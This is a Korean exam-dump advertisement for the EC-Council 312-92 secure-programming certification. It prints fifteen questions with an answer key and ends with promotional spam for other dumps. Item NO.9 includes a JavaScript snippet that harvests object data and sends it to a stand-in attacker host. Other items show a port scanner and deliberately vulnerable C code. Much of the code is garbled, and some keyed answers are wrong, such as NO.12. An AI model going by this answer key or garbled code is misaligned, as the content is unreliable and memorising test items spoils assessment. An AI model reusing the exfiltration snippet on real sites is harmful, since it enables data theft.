여러분이 어떤 업계에서 어떤 일을 하든지 모두 항상 업그레이되는 자신을 원할 것입니다.,it업계에서도 이러합니다.모두 자기자신의 업그레이는 물론 자기만의 공간이 있기를 바랍니다.전문적인 IT인사들은 모두 아시다싶이EC-COUNCIL 312-92인증시험이 여러분의 이러한 요구를 만족시켜드립니다.그리고 우리 ITExamDump는 이러한 꿈을 이루어드립니다.
우리 ITExamDump사이트에서 제공되는EC-COUNCIL인증312-92시험덤프의 일부분인 데모 즉 문제와 답을 다운받으셔서 체험해보면 우리ITExamDump에 믿음이 갈 것입니다. 우리ITExamDump의 제품을 구매하신다고 하면 우리는 최선을 다하여 여러분들한테 최고의 버전을 제공함으로 한번에EC-COUNCIL인증312-92시험을 패스하도록 하겠습니다. IT시험이라고 모두 무조건 외우고 장악하고 많은 시간을 투자해야만 된다는 사상을 깨게 될 것입니다.
ITExamDump는EC-COUNCIL인증312-92시험에 대하여 가이드를 해줄 수 있는 사이트입니다. ITExamDump는 여러분의 전업지식을 업그레이드시켜줄 수 잇고 또한 한번에EC-COUNCIL인증312-92시험을 패스하도록 도와주는 사이트입니다. ITExamDump제공하는 자료들은 모두 it업계전문가들이 자신의 지식과 끈임없은 경헌등으로 만들어낸 퍼펙트 자료들입니다. 품질은 정확도 모두 보장되는 문제집입니다.EC-COUNCIL인증312-92시험은 여러분이 it지식을 한층 업할수 잇는 시험이며 우리 또한 일년무료 업데이트서비스를 제공합니다.
지금 사회에 능력자들은 아주 많습니다.it인재들도 더욱더 많아지고 있습니다.많은 it인사들은 모두 관연 it인증시험에 참가하여 자격증취득을 합니다.자기만의 자리를 확실히 지키고 더 높은 자리에 오르자면 필요한 스펙이니까요.312-92시험은EC-COUNCIL인증의 중요한 시험이고 또 많은 it인사들은EC-COUNCIL자격증을 취득하려고 노력하고 있습니다.
시험 번호/코드: 312-92
시험 이름: EC-COUNCIL (EC-Council Certified Secure Programmer v2)
당신이 구입하기 전에 시도
일년동안 무료 업데이트
100% 환불보장약속
100% 합격율 보장
Q&A: 99 문항
업데이트: 2013-10-31
312-92 덤프무료샘플다운로드하기: http://www.itexamdump.com/312-92.html
NO.1 Fred is planning on using the windows socket application ClientApp.exe program to create a client-side
application that his employees will use. This program will access backend programs from two different
remote sites over WAN connections. If Fred does not make any modifications to the ClientApp.exe default
settings, what port must he have the network engineer open in order for the application to communicate?
A. 21
B. 23
C. 25
D. 80
Answer: D
EC-COUNCIL인증 312-92 312-92자료
NO.2 Steve is using the libcap library to create scripts for capturing and analyzing network traffic.
Steve has never used libcap before and is struggling with finding out the correct functions to use. Steve is
trying to pick the default network interface in his script and does not know which function to use. Which
function would he use to correctly choose the default interface in the script?
A. pcap_open_live
B. pcap_int_default
C. pcap_lookupdev
D. pcap_use_int
Answer: C
EC-COUNCIL최신덤프 312-92 312-92최신덤프
NO.3 Shayla is designing a web-based application that will pass data to and from a company extranet. This
data is very sensitive and must be protected at all costs. Shayla will use a digital certificate and a digital
signature to protect the data. The digital signature she has chosen to use is based on the difficulty in
computing discrete logarithms. Which digital signature has she chosen?
A. Rabin
B. Diffie-Hellman
C. SA-PSS
D. ElGamal
Answer: D
EC-COUNCIL 312-92 dump 312-92최신덤프
NO.4 Wayne is a gaming software developer for a large video gaming company in Los Angeles. Wayne has
just completed developing a new action/adventure game for the company that is to be released soon. To
protect the company s copyright on the game, Wayne would like to incorporate a technology that will
restrict the use of the digital files by controlling access, altering, sharing, copying, printing, and saving.
What technology does Wayne want to use?
A. ARM
B. WRM
C. DRM
D. Diffusion
Answer: C
EC-COUNCIL기출문제 312-92 312-92시험문제 312-92인증 312-92 312-92
NO.5 After learning from an external auditor that his code was susceptible to attack, George decided to
rewrite some of his code to look like the following. What is George preventing by changing the code?
public voif doContent(...) {
...
String s;
if ((s = getUsernameByID( userid )) != null) {
s = StringUtils.encodeToHTML(s, 50);
response.write( <br>Applicant:<u>
+ s +
</u> );
}
...
}
A. Query string manipulation
B. XSS attack
C. Cookie poisoning
D. SQL injection
Answer: B
EC-COUNCIL 312-92자격증 312-92
NO.6 Processes having the CAP_NET_BIND_SERVICE
can listen on which ports?
A. Any TCP port over 1024
B. Any UDP port under 1024
C. Any TCP port under 1024
D. Any UDP port over 1024
Answer: C
EC-COUNCIL 312-92최신덤프 312-92
NO.7 Devon is an applications developer that just got back from a conference on how to correctly write code.
Devon has a number of programs he has written that access data across WAN links, so he is particularly
concerned about their security. Devon writes a script in C++ to check the security of the programs running
on his internal servers. What will the following code from Devon s script accomplish?
#include <iostream>
#include <socket.cpp>
#include <util.h>
using namespace std;
bool tryPort(int p);
string target("");
int main(int argC, char *argV[])
{
printf("PlagueZ port scanner 0.1\n");
int startPort = getInt("start Port: ");
int endPort = getInt("end Port: ");
target = getString("Host: ");
printf("[Processing port %d to %d]\n",
startPort, endPort);
for(int i=0; i<endPort; i++)
{
printf("[Trying port: %d]\n", i);
if(tryPort(i)) // port open
printf("[Port %d is open]\n", i);
}
printf("------Scan Finished-------\n");
system("pause");
return 0;
}
bool tryPort(int p)
{
SocketClient *scan;
try
{
scan = new SocketClient(target, p);
}
catch(int e) { delete &scan; return
false; }
delete &scan;
return true;
}
A. Scan the perimeter firewall for DoS vulnerabilities
B. Create socket connections to the remote sites to check their security
C. Close off any ports used by malicious code
D. Scan for open ports
Answer: D
EC-COUNCIL기출문제 312-92 312-92 312-92기출문제 312-92덤프
NO.8 John is creating a website using ASP. John s web pages will have a number of calculations, so he
decides to create an include file that the pages will call so he does not have to rewrite the formula
numerous times. John s website will be hosted by a server running IIS. John wants to ensure that the
include source code is not revealed when the pages are viewed, so he gives the include an .asp
extension.
When IIS processes the include file, which system file will be used to hide the include source code?
A. ASP.dll
B. Include.dll
C. IISASP.dll
D. IIS.dll
Answer: A
EC-COUNCIL dump 312-92최신덤프 312-92 dumps
NO.9 Travis, a senior systems developer for YNY Services, received an email recently from an unknown
source. Instead of opening the email on his normal production machine, Travis decides to copy the email
to a thumb drive and examine it from a quarantined PC not on the network. Travis examines the email and
discovers a link that is supposed to take him to http://scarysite.com. Travis decides to get back on his
production computer and examine the code of that site.
From the following code snippet, what has Travis discovered?
<script>
function object() {
this.email setter = captureobject
}
function captureobject(x) {
var objstring =
for(fld in this) {
obstring += fld + :
this[fld] + , ;
}
obstring += email:
+ x;
var req = new XMLHttpRequest();
req.open( GET , http://scarysite.com?obj=
+
escape(objString), true);
req.send(null);
}
</script>
A. URL obfuscation
B. XSS attack
C. JavaScript hijacking
D. URL tampering
Answer: C
EC-COUNCIL자료 312-92 312-92 312-92
NO.10 Kenny is the CIO for Fredrickson Entertainment, a gaming software company in Omaha. The
developers in Kenny s company have just finished creating a 3D first person shooter game that will be
released to the market within the next couple of months. Kenny is trying to decide what type of license or
activation code structure they should use for the game to prevent piracy and protect their product. Kenny
decides to go with an approach that will allow each sold copy to be activated online up to five times
because he knows his users might have multiple PCs or might need to reinstall the product at some point.
What type of activation policy has Kenny decided to go with?
A. Loose license enforced
reasonable use
B. License terms enforced
fair use
C. Strict license terms enforced
D. Monitor only mode
Answer: A
EC-COUNCIL 312-92 pdf 312-92
NO.11 Which Linux command will securely delete a file by overwriting its contents?
A. rm rf /
B. Shred
C. ps rm
D. del rm
Answer: B
EC-COUNCIL최신덤프 312-92자격증 312-92덤프 312-92기출문제
NO.12 What security package is implemented with the following code.?
dwStatus = DsMakSpn
(
ldap ,
MyServer.Mydomain.com ,
NULL,
0,
NULL,
&pcSpnLength,
pszSpn
);
rpcStatus = RpcServerRegisterAuthInfo
(
psz
RPC_C_AUTHN_GSS_NEGOTIATE,
NULL,
NULL
);
A. Diffie-Hellman encryption
B. Repurposing
C. SSPI
D. SMDT
Answer: A
EC-COUNCIL 312-92 pdf 312-92시험문제
NO.13 What would be the result of the following code?
#include <stdio.h>
#include <stdlib.h>
int main(int argc, char *argv[])
{
char *input=malloc(20);
char *output=malloc(20);
strcpy(output, normal output );
strcpy(input, argv[1]); printf( input at %p: %s\n , input, input);
printf( output at %p: %s\n , output, output);
printf( \n\n%s\n , output);
}
A. Stack buffer overflow
B. Heap overflow
C. Query string manipulation
D. Pointer Subterfuge
Answer: B
EC-COUNCIL pdf 312-92자료 312-92 312-92 312-92 312-92
NO.14 Harold is programming an application that needs to be incorporate data encryption. Harold decides to
utilize an encryption algorithm that uses 4-bit working registers instead of the usual 2bit working registers.
What encryption algorithm has Harold decided to use?
A. Blowfish
B. RC5
C. RC4
D. RC6
Answer: D
EC-COUNCIL dumps 312-92 312-92 dumps
NO.15 David is an applications developer working for Dewer and Sons law firm in Los Angeles David just
completed a course on writing secure code and was enlightened by all the intricacies of how code must
be rewritten many times to ensure its security. David decides to go through all the applications he has
written and change them to be more secure. David comes across the following snippet in one of his
programs:
#include <stdio.h>
int main(int argc, char **argv)
{
int number = 5;
printf(argv[1]);
putchar( \n );
printf( number (%p) is equal to %d\n ,
&value, value);
}
What could David change, add, or delete to make this code more secure?
A. Change putchar( \n ) to putchar( %s , \n )
B. Change printf(argv[1]) to printf( %s , argv[1])
C. Change printf(argv[1]) to printf(constv [0])
D. Change int number = 5 to const number =
Answer: B
EC-COUNCIL자격증 312-92 312-92
ITexamdump의 74-338덤프의 VCE테스트프로그램과 MB5-854덤프는 한방에 시험을 패스하도록 도와드립니다. ITexamdump 에서는 최신버전의 LOT-404시험에 대비한 고품질 덤프와 JN0-690시험 최신버전덤프를 제공해드립니다. 최고품질 M70-301시험자료는 100% 간단하게 시험패스하도록 최선을 다하고 있습니다. IT인증시험패스는 이토록 간단합니다.
댓글 없음:
댓글 쓰기